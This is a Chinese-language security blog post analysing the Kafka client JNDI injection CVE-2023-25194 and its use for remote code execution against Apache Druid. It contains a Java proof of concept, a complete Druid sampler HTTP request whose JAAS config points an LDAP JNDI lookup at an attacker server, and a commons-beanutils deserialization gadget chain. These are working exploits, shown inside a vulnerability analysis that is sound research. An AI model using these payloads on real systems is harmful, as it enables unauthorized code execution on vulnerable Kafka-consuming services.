Apache Kafka Clients JNDI (CVE-2023-25194) & Druid RCE 分析

admin 2023年12月16日08:46:12评论21 views字数 7443阅读24分48秒阅读模式

Apache Kafka Clients JNDI (CVE-2023-25194) 分析以及在 Apache Druid 环境下的利用

影响版本: 2.3.0-3.3.2, 3.4.0 及以上的版本不受影响

漏洞的本质其实是 Kafka 支持基于 JAAS 的 SASL 认证, 看到网上的分析文章竟然没怎么提这个, 这里就简单说一下

https://zh.wikipedia.org/wiki/简单认证与安全层

https://zh.wikipedia.org/wiki/JAAS

SASL 是一种在网络协议中用于认证和数据加密的标准, 而 JAAS 是 SASL 在 Java 中的一个实现

JAAS 是一个以用户为中心的安全框架, 作为 Java 以代码为中心的安全的补充

有趣的是 Shiro (JSecurity) 最初被开发出来的原因就是由于当时 JAAS 存在着许多缺点

Kafka 配置认证的相关文档: https://kafka.apache.org/documentation/

在 Kafka 中, 支持动态配置 JAAS 认证

https://kafka.apache.org/documentation/_client_dynamicjaas

https://kafka.apache.org/documentation/

也就是说我们可以直接将 JAAS 配置项作为 producer 或 consumer 的属性 (properties), 而无需创建物理配置文件, 这个属性的名字就是 sasl.jaas.config

JAAS 官方文档

https://docs.oracle.com/javase/8/docs/technotes/guides/security/jaas/JAASRefGuide.htm

https://docs.oracle.com/javase/7/docs/technotes/guides/security/jaas/tutorials/LoginConfigFile.html

sasl.jaas.config 的格式如下

loginModuleClass controlFlag (optionName=optionValue)*;

其中的 loginModuleClass 代表认证方式, 例如 LDAP, Kerberos, Unix 认证

JDK 自带的 loginModule 位于 com.sun.security.auth.module

http://cn-sec.com/wp-content/uploads/2023/12/20231215113733-36.png

其中的 JndiLoginModule 原本是为了支持以 JNDI 的方式查询各种 Service Provider 从而进行身份认证, 但是由于在认证过程中的 user.provider.url 参数可控, 导致可以进行任意 lookup, 引发 JNDI 注入

在给出 PoC 之前, 先来了解一下 Kafka 的相关概念

参考文章: https://segmentfault.com/a/1190000021138998

Kafka 本质上是一个分布式, 订阅式, 支持流式处理的消息队列, 通过 ZooKeeper 管理集群, 几个基本概念如下

  • 消息: Kafka 中的数据单元, 也被称为记录, 类似于数据表中某一行的记录
  • 主题: 消息的种类称为主题 (Topic), 相当于对消息进行分类, 类似数据库中的表
  • 生产者: 向主题发布消息的客户端应用程序称为生产者 (Producer), 生产者用于持续不断的向某个主题发送消息
  • 消费者: 订阅主题消息的客户端程序称为消费者 (Consumer), 消费者用于处理生产者产生的消息
  • Broker: 一个独立的 Kafka 服务器就被称为 Broker, Broker 接收来自生产者的消息, 为消息设置偏移量, 并提交消息到磁盘保存

Kafka 的四个核心 API

  • Producer API: 它允许应用程序向一个或多个 topics 上发送消息记录
  • Consumer API: 允许应用程序订阅一个或多个 topics 并处理为其生成的记录流
  • Streams API: 它允许应用程序作为流处理器, 从一个或多个主题中消费输入流并为其生成输出流, 有效的将输入流转换为输出流
  • Connector API: 它允许构建和运行将 Kafka 主题连接到现有应用程序或数据系统的可用生产者和消费者. 例如 关系数据库的连接器可能会捕获对表的所有更改

本文中提到的 CVE-2023-25194 为 Kafka Client 的漏洞, Kafka Client 的作用就是将某个服务作为生产者或消费者连接到 Kafka Server, 然后不断发送/接收消息并进行后续处理

因为 Kafka 支持配置 JAAS 认证, 所以 Client 要想连接到 Server, 就也必须要先配置与 Server 一致的 JAAS Module, 如果这时候将 Module 指定为 JndiLoginModule, 同时配置恶意的 user.provider.url, 就可以在向 Server 发起连接之前, 在 Client 端引发 JNDI 注入

PoC 如下

import org.apache.kafka.clients.consumer.KafkaConsumer;
import org.apache.kafka.clients.producer.KafkaProducer;

import java.util.Properties;

public class Demo {
    public static void main(String[] args) throws Exception {
        Properties properties = new Properties();
        properties.put("bootstrap.servers", "127.0.0.1:1234");
//         for KafkaProducer
//        props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
//        props.put("value.serializer","org.apache.kafka.common.serialization.StringSerializer");
//         for KafkaConsumer
        properties.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
        properties.put("value.deserializer","org.apache.kafka.common.serialization.StringDeserializer");

        properties.put("sasl.mechanism", "PLAIN");
        properties.put("security.protocol", "SASL_SSL");
        properties.put("sasl.jaas.config", "com.sun.security.auth.module.JndiLoginModule " +
                "required " +
                "user.provider.url=\"ldap://127.0.0.1:1389/Basic/Command/open -a Calculator\" " +
                "useFirstPass=\"true\" " +
                "group.provider.url=\"xxx\";");

//        KafkaProducer<String, String> kafkaProducer = new KafkaProducer<>(properties);
//        kafkaProducer.close();

        KafkaConsumer<String, String> kafkaConsumer = new KafkaConsumer<>(properties);
        kafkaConsumer.close();
    }
}

依赖

<dependency>
    <groupId>org.apache.kafka</groupId>
    <artifactId>kafka-clients</artifactId>
    <version>3.2.2</version>
</dependency>

注意整个过程其实并没有与 bootstrap.servers 进行通信, 所以这个值只要格式正确就行

至于为什么要配置 sasl.mechanismsecurity.protocol, 原因都可以在官方文档和源码里面找到

调试流程, 以 KafkaConsumer 类为例

http://cn-sec.com/wp-content/uploads/2023/12/20231215113733-23.png

在 KafkaConsumer 的构造方法中, 会初始化 config (即 properties) 并创建 ChannelBuilder

http://cn-sec.com/wp-content/uploads/2023/12/20231215113734-60.png

http://cn-sec.com/wp-content/uploads/2023/12/20231215113735-37.png

当 securityProtocol 为 SASL_SSLSASL_PLAINTEXT 时, 会创建 JaasContext

http://cn-sec.com/wp-content/uploads/2023/12/20231215113736-86.png

http://cn-sec.com/wp-content/uploads/2023/12/20231215113737-93.png

调用 channelBuilder 的 configure 方法

http://cn-sec.com/wp-content/uploads/2023/12/20231215113738-51.png

在这里会获取 LoginManager

http://cn-sec.com/wp-content/uploads/2023/12/20231215113739-53.png

http://cn-sec.com/wp-content/uploads/2023/12/20231215113740-36.png

http://cn-sec.com/wp-content/uploads/2023/12/20231215113741-62.png

http://cn-sec.com/wp-content/uploads/2023/12/20231215113742-99.png

http://cn-sec.com/wp-content/uploads/2023/12/20231215113743-51.png

此时调用 JndiLoginModule 的 initialize 方法

http://cn-sec.com/wp-content/uploads/2023/12/20231215113744-33.png

http://cn-sec.com/wp-content/uploads/2023/12/20231215113745-29.png

再次调用 JndiLoginModule 的 login 方法

http://cn-sec.com/wp-content/uploads/2023/12/20231215113746-78.png

最开头除了 userProvider 以外还会验证 groupProvider, 如果为空就会抛出异常

http://cn-sec.com/wp-content/uploads/2023/12/20231215113747-7.png

当 tryFirstPass 或 useFirstPass 为 true 时, 会调用 attemptAuthentication 方法

http://cn-sec.com/wp-content/uploads/2023/12/20231215113748-90.png

触发 JNDI 注入

在 3.4.0 版本中, 官方的修复方式是增加了对 JndiLoginModule 的黑名单

org.apache.kafka.common.security.JaasContext#throwIfLoginModuleIsNotAllowed

private static void throwIfLoginModuleIsNotAllowed(AppConfigurationEntry appConfigurationEntry) {
    Set<String> disallowedLoginModuleList = (Set)Arrays.stream(System.getProperty("org.apache.kafka.disallowed.login.modules", "com.sun.security.auth.module.JndiLoginModule").split(",")).map(String::trim).collect(Collectors.toSet());
    String loginModuleName = appConfigurationEntry.getLoginModuleName().trim();
    if (disallowedLoginModuleList.contains(loginModuleName)) {
        throw new IllegalArgumentException(loginModuleName + " is not allowed. Update System property '" + "org.apache.kafka.disallowed.login.modules" + "' to allow " + loginModuleName);
    }
}

影响版本: <= 25.0.0, 26.0.0 及以上不受影响 (截至目前暂未正式发布)

Apache Druid 是一个实时分析型数据库, 它支持从 Kafka 中导入数据 (Consumer) , 因为目前最新版本的 Apache Druid 25.0.0 所用 kafka-clients 依赖的版本仍然是 3.3.1, 即存在漏洞的版本, 所以如果目标 Druid 存在未授权访问 (默认配置无身份认证), 则可以通过这种方式实现 RCE

有意思的是, Druid 包含了 commons-beanutils:1.9.4 依赖, 所以即使在高版本 JDK 的情况下也能通过 LDAP JNDI 打反序列化 payload 实现 RCE

Druid Web Console - Load data - Apache Kafka

http://cn-sec.com/wp-content/uploads/2023/12/20231215113749-72.png

http://cn-sec.com/wp-content/uploads/2023/12/20231215113750-21.png

问题主要出在 Consumer properties 这块, 它实际上对应的就是之前实例化 KafkaConsumer 时传入的 properties, 所以依然可以配置 sasl.jaas.config

POST /druid/indexer/v1/sampler

{
    "type": "kafka",
    "spec": {
        "type": "kafka",
        "ioConfig": {
            "type": "kafka",
            "consumerProperties": {
                "bootstrap.servers": "127.0.0.1:1234",
                "sasl.mechanism": "PLAIN",
                "security.protocol": "SASL_SSL",
                "sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://127.0.0.1:1389/Basic/Command/open -a Calculator\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
            },
            "topic": "23",
            "useEarliestOffset": true,
            "inputFormat": {
                "type": "regex",
                "pattern": "([\\s\\S]*)",
                "listDelimiter": "56616469-6de2-9da4-efb8-8f416e6e6965",
                "columns": ["raw"]
            }
        },
        "dataSchema": {
            "dataSource": "sample",
            "timestampSpec": {
                "column": "!!!_no_such_column_!!!",
                "missingValue": "1970-01-01T00:00:00Z"
            },
            "dimensionsSpec": {},
            "granularitySpec": {
                "rollup": false
            }
        },
        "tuningConfig": {
            "type": "kafka"
        }
    },
    "samplerConfig": {
        "numRows": 500,
        "timeoutMs": 15000
    }
}

http://cn-sec.com/wp-content/uploads/2023/12/20231215113751-93.png

高版本打 commons-beanutils no cc payload

package com.example.CommonsBeanutils;

import com.example.Reflection;
import com.example.Serialization;
import com.example.TemplatesEvilClass;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;

import java.util.Base64;
import java.util.PriorityQueue;

public class CommonsBeanutils1NoCC {
    public static void main(String[] args) throws Exception{
        TemplatesImpl templatesImpl = new TemplatesImpl();
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.get(TemplatesEvilClass.class.getName());
        byte[] code = clazz.toBytecode();

        Reflection.setFieldValue(templatesImpl, "_name", "Hello");
        Reflection.setFieldValue(templatesImpl, "_bytecodes", new byte[][]{code});
        Reflection.setFieldValue(templatesImpl, "_tfactory", new TransformerFactoryImpl());

//        BeanComparator beanComparator = new BeanComparator(null, Collections.reverseOrder());
        BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
        PriorityQueue priorityQueue = new PriorityQueue(2, beanComparator);
        priorityQueue.add("1");
        priorityQueue.add("1");

        beanComparator.setProperty("outputProperties");
        Reflection.setFieldValue(priorityQueue, "queue", new Object[]{templatesImpl, templatesImpl});
//        Serialization.test(priorityQueue);
        System.out.println(Base64.getEncoder().encodeToString(Serialization.serialize(priorityQueue)));
    }
}

lndzck4wha1.png

在 druid-kafka-indexing-service 这个 extension 中可以看到实例化 KafkaConsumer 的过程

5euefsiwbjm.png

Apache Druid 26.0.0 更新了 kafka 依赖的版本

https://github.com/apache/druid/blob/26.0.0/pom.xml

mwakey0ktry.png

- By:X1r0z[exp10it.cn]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月16日08:46:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Kafka Clients JNDI (CVE-2023-25194) & Druid RCE 分析https://cn-sec.com/archives/2305038.html

发表评论

匿名网友 填写信息